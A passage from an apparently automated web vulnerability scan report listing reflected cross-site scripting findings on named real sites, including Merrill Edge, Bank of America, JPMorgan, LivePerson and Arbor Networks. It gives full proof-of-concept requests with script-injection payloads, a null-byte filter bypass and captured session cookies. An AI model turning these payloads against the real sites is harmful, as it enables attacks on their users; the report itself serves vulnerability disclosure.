Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script>
...[SNIP]...

3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=dIEXSEv/0xGBaoStRHjbLBFpbuTZ8Y6DJsxG1YEiFq+ckpbUGEPvF5soHoRCTuqdY5GFAi7V689a3IoXqMyRsNOMmpFP9ZyxbS3fP18I2G8eKZUwPltSUnDZ+XowkaqzT845OkRm0H5eBEzw8EzY0dTi3m0KD2RfAU0rM27TX+C/UCHWIWQbvjfMWMVrSs5JWS6fWy23rnDP/DKIrVlH2rFTaVbddQamnQgVSpdZ0Vrf0BEfULPfNXzQrYUBApPspod1ih7hD6GdecmOLuW6iwxf4RFqyhHMsCYkRh5mpVON9vK201ZlkRP+HjcN2h7mPdq5MW1j7b2AKzhjQdsy4gqqpYB1Ea5KIs6iL59fIeLHRF2dJfWHE0UipyvrblJ6M6tpPQDW/cLYslbceWqoa2ohyAuWIZgkMb8Vt/WVM81r/V/AhEi1RsDXMtI0IxdkRUqT+914Cn22id6le4Ek42m7twdj5zjXArs+0i22BTRdo28rygzloxbqLhbDfXfnaHiQ/erYFM7waoK8lv2y5Le/PNhYPGABf9hyV84T/SUGjzjjQgscaNhulf/UuxzSRIVu4AV2axWy6eD2kvUlaxUOzI9LLvTr7sTy8JWmXbj4pngOl2TytK3hx78r2Aqb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=ede7c355a551459fb3f0986a23c39c18; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www2.bankofamerica.com
Path:   /promos/jump/greatdeals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:31 GMT
Content-type: text/html
Set-Cookie: SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; path=/; domain=.bankofamerica.com; secure
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<XMP> 3BB0E" A=B B8409311022
</XMP>
...[SNIP]...

3.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33074
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/
Date: Wed, 02 Feb 2011 22:00:02 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3">
...[SNIP]...

3.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:04:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3685
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

3.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /help/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="te
...[SNIP]...
<a target="_parent" href="http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d">
...[SNIP]...

3.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT
Date: Wed, 02 Feb 2011 22:19:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <t
...[SNIP]...
<!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a -->
...[SNIP]...

3.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b90d28fbf3f48927538041d78d1a0444; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:34 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8de9b\"><script>alert(1)</script>6af6a5ce680">
...[SNIP]...

3.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cleanpipes

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=76e10529127394c687709c1a2755ca13; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en56a91\"><script>alert(1)</script>4a8a421a526">
...[SNIP]...

3.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/865.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=daccb31a391d41d40e6cb15ef14d3825; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:58:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena7177\"><script>alert(1)</script>7651ebbe8e8">
...[SNIP]...

3.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d36c06ec55280b565d88ed244268fbfa; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Fri, 04-Feb-2011 00:05:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:35 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="eneaab4\"><script>alert(1)</script>d4517558dd0">
...[SNIP]...

3.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

